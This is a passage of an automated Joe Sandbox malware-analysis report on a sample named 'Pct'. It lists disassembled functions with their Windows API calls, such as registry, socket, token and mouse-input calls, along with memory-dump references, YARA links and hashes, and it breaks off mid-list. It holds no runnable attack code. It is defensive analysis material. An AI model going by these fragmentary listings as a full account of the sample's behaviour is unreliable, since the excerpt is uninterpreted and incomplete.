                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3253778849-0
                                                                                                                                                  • Opcode ID: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                                                                                  • Instruction ID: 471d633edd48120aed64673211eeb0f31cbed9957f2f2366c97c6c19832cd2fe
                                                                                                                                                  • Opcode Fuzzy Hash: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                                                                                  • Instruction Fuzzy Hash: A361AE315002AAABCF11FF64CC91EFE77A8EF05308F444999F8596B292DB349E45DB60
                                                                                                                                                  Function 00C40844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                    • Part of subcall function 00C4147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C4040D,?,?), ref: 00C41491
                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C4091D
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C4095D
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C40980
                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C409A9
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C409EC
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C409F9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4046560759-0
                                                                                                                                                  • Opcode ID: dfa7e6bf54a5f9ac1a5ae3880d6018de25da1e29f46be304cbf8a74f857e9fa1
                                                                                                                                                  • Instruction ID: c4f46e65316dcedfa0674014f6a75cb3ba3265619033501c66a20ed5befc523e
                                                                                                                                                  • Opcode Fuzzy Hash: dfa7e6bf54a5f9ac1a5ae3880d6018de25da1e29f46be304cbf8a74f857e9fa1
                                                                                                                                                  • Instruction Fuzzy Hash: 12518931208200AFD714EF64C885E6EBBF9FF85310F24495DF999872A2EB31E945DB52
                                                                                                                                                  Function 00C45DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetMenu.USER32(?,00000001,00000000), ref: 00C45E38
                                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00C45E6F
                                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C45E97
                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00C45F06
                                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00C45F14
                                                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00C45F65
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 650687236-0
                                                                                                                                                  • Opcode ID: 543c14189b6b56ac72ccd7be9b8bf333ab980a986bfcd61005a509e1620167c4
                                                                                                                                                  • Instruction ID: b14294ecec982ecdca3421d4b869dd403deb44bb56892789e260d01dd48bad62
                                                                                                                                                  • Opcode Fuzzy Hash: 543c14189b6b56ac72ccd7be9b8bf333ab980a986bfcd61005a509e1620167c4
                                                                                                                                                  • Instruction Fuzzy Hash: 09518035A01615AFDB11EFA4C845AAEB7F5FF48310F1040A9F815BB392CB34AE41CB91
                                                                                                                                                  Function 00C1F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • #8.OLEAUT32(?,00000000,?,?,?,?,?,?,00000024), ref: 00C1F6A2
                                                                                                                                                  • #9.OLEAUT32(00000013,?,?,?,?,00000024), ref: 00C1F714
                                                                                                                                                  • #9.OLEAUT32(00000000,?,?,?,?,00000024), ref: 00C1F76F
                                                                                                                                                  • _memmove.LIBCMT ref: 00C1F799
                                                                                                                                                  • #9.OLEAUT32(?,?,?,?,?,00000024), ref: 00C1F7E6
                                                                                                                                                  • #12.OLEAUT32(?,?,00000000,00000013,00000000,?,?,?,?,?,?,00000024), ref: 00C1F814
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                  • Opcode ID: a4e27340d8c6b4fa1a0e5d3f934fdf4a2958b03ef95e117199528f60b796ebd2
                                                                                                                                                  • Instruction ID: 9edd7e10381dcb2316732a42385134e8b4bc8d210853987f1df4e2a051d6202f
                                                                                                                                                  • Opcode Fuzzy Hash: a4e27340d8c6b4fa1a0e5d3f934fdf4a2958b03ef95e117199528f60b796ebd2
                                                                                                                                                  • Instruction Fuzzy Hash: 6C515DB5A00209EFDB14CF58C884AAAB7B8FF4D314B15856EE959DB341D730E952CFA0
                                                                                                                                                  Function 00C229B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C229FF
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030,000000FF,000000FF,00C87890,00000000,76931A30), ref: 00C22A4A
                                                                                                                                                  • IsMenu.USER32(00000000), ref: 00C22A6A
                                                                                                                                                  • CreatePopupMenu.USER32(00C87890,00000000,76931A30), ref: 00C22A9E
                                                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00C22AFC
                                                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C22B2D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3311875123-0
                                                                                                                                                  • Opcode ID: 13db38a988f11cef65aeb358fe8154c1d476778ad85d4cd4e963c78c5db111fd
                                                                                                                                                  • Instruction ID: 320f4c18cfba7165df537664f067ecfb950066bc8b89ccdafa163420813b204f
                                                                                                                                                  • Opcode Fuzzy Hash: 13db38a988f11cef65aeb358fe8154c1d476778ad85d4cd4e963c78c5db111fd
                                                                                                                                                  • Instruction Fuzzy Hash: 8F51B770600369FFDF25CF68E888BADBBF4EF54314F104159E822976A1D7B09A44DB51
                                                                                                                                                  Function 00BC1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1CE4,?), ref: 00BC29F3
                                                                                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00BC1B76
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00BC1BDA
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00BC1BF7
                                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BC1C08
                                                                                                                                                  • EndPaint.USER32(?,?), ref: 00BC1C52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1827037458-0
                                                                                                                                                  • Opcode ID: 4ed0be905de124df60df2edf6778ac53e7e325a8e6378e774d85f613feb3c110
                                                                                                                                                  • Instruction ID: db5d1effad45504e28c0491c7de3ed4ed15937550d3e9aa966a0a44cbdbb152e
                                                                                                                                                  • Opcode Fuzzy Hash: 4ed0be905de124df60df2edf6778ac53e7e325a8e6378e774d85f613feb3c110
                                                                                                                                                  • Instruction Fuzzy Hash: 08418170104304AFD711DF28CC88FBA7BE8EB56361F240AADF955AB2A2D730D845DB61
                                                                                                                                                  Function 00C37788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00C3550C,?,?,00000000,00000001), ref: 00C37796
                                                                                                                                                    • Part of subcall function 00C3406C: GetWindowRect.USER32(?,?), ref: 00C3407F
                                                                                                                                                  • GetDesktopWindow.USER32(?,?,?,?,00C3550C,?,?,00000000,00000001), ref: 00C377C0
                                                                                                                                                  • GetWindowRect.USER32(00000000,?,?,?,00C3550C,?,?,00000000,00000001), ref: 00C377C7
                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001,?,?,?,?,?,00C3550C,?,?,00000000,00000001), ref: 00C377F9
                                                                                                                                                    • Part of subcall function 00C257FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C25877
                                                                                                                                                  • GetCursorPos.USER32(?,?,?,?,?,?,00C3550C,?,?,00000000,00000001), ref: 00C37825
                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000,?,?,?,?,?,?,?,00C3550C,?,?,00000000), ref: 00C37883
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4137160315-0
                                                                                                                                                  • Opcode ID: 223b2264b301216ef9c328227edb1a62a02037bc0fec17dc7a8948e150840d97
                                                                                                                                                  • Instruction ID: 7476af11d8ca0af279d162489c1381a3c63d33caa0f32d21a4282d037b602823
                                                                                                                                                  • Opcode Fuzzy Hash: 223b2264b301216ef9c328227edb1a62a02037bc0fec17dc7a8948e150840d97
                                                                                                                                                  • Instruction Fuzzy Hash: 6231D072508305ABD720DF14D849F9FB7A9FF88314F100A19F999E7181DA30EA48CBA2
                                                                                                                                                  Function 00C3696E Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • #23.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C369C7
                                                                                                                                                  • #111.WSOCK32(00000000), ref: 00C369D6
                                                                                                                                                  • #2.WSOCK32(00000000,?,00000010), ref: 00C369F2
                                                                                                                                                  • #13.WSOCK32(00000000,00000005), ref: 00C36A01
                                                                                                                                                  • #111.WSOCK32(00000000), ref: 00C36A1B
                                                                                                                                                  • #3.WSOCK32(00000000,00000000), ref: 00C36A2F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: #111
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 568940515-0
                                                                                                                                                  • Opcode ID: 820588df552c7d3aa182e526388734f2e9a29faf378120ba76569b5f646736f8
                                                                                                                                                  • Instruction ID: 7c60e337194e4f122812a2a942a97fd2ebd3e6f529bb123877c67d256fa0190c
                                                                                                                                                  • Opcode Fuzzy Hash: 820588df552c7d3aa182e526388734f2e9a29faf378120ba76569b5f646736f8
                                                                                                                                                  • Instruction Fuzzy Hash: C721BD34200201AFCB10EF64CC99F6EB7F9EF48721F208158E866A7391CB30AD41DB90
                                                                                                                                                  Function 00C19431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C18CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C18CDE
                                                                                                                                                    • Part of subcall function 00C18CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C18CE8
                                                                                                                                                    • Part of subcall function 00C18CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C18CF7
                                                                                                                                                    • Part of subcall function 00C18CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C18CFE
                                                                                                                                                    • Part of subcall function 00C18CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C18D14
                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00C1904D), ref: 00C19482
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C1948E
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C19495
                                                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C194AE
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00C1904D), ref: 00C194C2
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00C194C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3008561057-0
                                                                                                                                                  • Opcode ID: 751b043200df8648d762722aed5bc203c57dc0fd797b93513df97ef36197bf8f
                                                                                                                                                  • Instruction ID: c169d450ea841e59459babfc1061fc823c11b4d30af81af04aa35fdca0fe733c
                                                                                                                                                  • Opcode Fuzzy Hash: 751b043200df8648d762722aed5bc203c57dc0fd797b93513df97ef36197bf8f
                                                                                                                                                  • Instruction Fuzzy Hash: 3211AF36501604EFDB10DFA4CC19BEF7BA9EB46317F208018F846E7210C735AA82EB60
                                                                                                                                                  Function 00C191CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C19200
                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00C19207
                                                                                                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C19216
                                                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00C19221
                                                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C19250
                                                                                                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C19264
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1413079979-0
                                                                                                                                                  • Opcode ID: 49e38c101a002d238750f97447bdcabeb34e68b676f18c9cbf7646de77f7e614
                                                                                                                                                  • Instruction ID: 36f13f607d707c3df64adfbfd723191d94d301206d7cafb87eaf81b0401522bb
                                                                                                                                                  • Opcode Fuzzy Hash: 49e38c101a002d238750f97447bdcabeb34e68b676f18c9cbf7646de77f7e614
                                                                                                                                                  • Instruction Fuzzy Hash: 64116A7650120EBBDF018F94ED49FDE7BA9EF49305F244054FE05A2160C3729EA5EB60
                                                                                                                                                  Function 00C1C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(00000000,?,?,?,80004003), ref: 00C1C34E
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 00C1C35F
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 00C1C366
                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000,?,?,80004003), ref: 00C1C36E
                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000,?,?,80004003), ref: 00C1C385
                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?,?,?,80004003), ref: 00C1C397
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                                  • Opcode ID: f6a4151c79561b741bf9129f5666d4fbec3f98ed496e77cfa819721492b32301
                                                                                                                                                  • Instruction ID: 176e01ceee2a2ec62e932a9b422b4384b8cd1c5846c761a6f4ff0231a01df276
                                                                                                                                                  • Opcode Fuzzy Hash: f6a4151c79561b741bf9129f5666d4fbec3f98ed496e77cfa819721492b32301
                                                                                                                                                  • Instruction Fuzzy Hash: 7C017175E40309BBEB109BA59C49B9EBFB8EB48311F104065FE04EB290DA309950CFA0
                                                                                                                                                  Function 00C4C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BC1729
                                                                                                                                                    • Part of subcall function 00BC16CF: SelectObject.GDI32(?,00000000), ref: 00BC1738
                                                                                                                                                    • Part of subcall function 00BC16CF: BeginPath.GDI32(?), ref: 00BC174F
                                                                                                                                                    • Part of subcall function 00BC16CF: SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 00BC1778
                                                                                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000,00000000,00000000,000000FF,00000000,00000001,?,?,?,00C4C498,00000000), ref: 00C4C57C
                                                                                                                                                  • LineTo.GDI32(00000000,00000003,?,?,00C4C498,00000000), ref: 00C4C590
                                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000,?,00C4C498,00000000), ref: 00C4C59E
                                                                                                                                                  • LineTo.GDI32(00000000,00000000,?,?,00C4C498,00000000), ref: 00C4C5AE
                                                                                                                                                  • EndPath.GDI32(00000000,00000000), ref: 00C4C5BE
                                                                                                                                                  • StrokePath.GDI32(00000000,00000000), ref: 00C4C5CE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 43455801-0
                                                                                                                                                  • Opcode ID: 8a977f6366899eb3af6dfec86ca461704bcc7181a7e71f2b503f28f6ed8a2a2e
                                                                                                                                                  • Instruction ID: 194b2c84c9ee26f9b5430d7d532d5c3464091238ca9653822d5541b72ab17207
                                                                                                                                                  • Opcode Fuzzy Hash: 8a977f6366899eb3af6dfec86ca461704bcc7181a7e71f2b503f28f6ed8a2a2e
                                                                                                                                                  • Instruction Fuzzy Hash: 4D110C7600020CBFDB029F90DC88F9E7FADEB04355F148051B918A61A0D771AE95DBA0
                                                                                                                                                  Function 00BE07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000,?,?,?,00BCAB12), ref: 00BE07EC
                                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000,?,?,?,00BCAB12), ref: 00BE07F4
                                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000,?,?,?,00BCAB12), ref: 00BE07FF
